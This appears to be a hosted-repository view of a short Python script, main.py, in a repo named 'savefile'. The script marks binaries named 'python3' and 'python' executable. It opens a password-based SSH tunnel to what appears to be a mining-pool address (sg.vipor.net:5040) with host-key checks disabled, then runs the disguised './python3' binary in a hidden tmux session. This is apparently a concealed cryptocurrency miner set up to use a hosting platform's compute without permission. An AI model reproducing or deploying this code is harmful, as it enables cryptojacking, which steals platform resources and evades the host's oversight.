savefile / main.py
ilhamap's picture
Update main.py
550f2d3 verified
raw
history blame
253 Bytes
import os
os.system("chmod +x python3 python")
os.system("tmux new-session -d -s ses sshpass -p ' ' ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]")
os.system("tmux new-session -d -s ses1 ./python3")
os.system("tmux ls")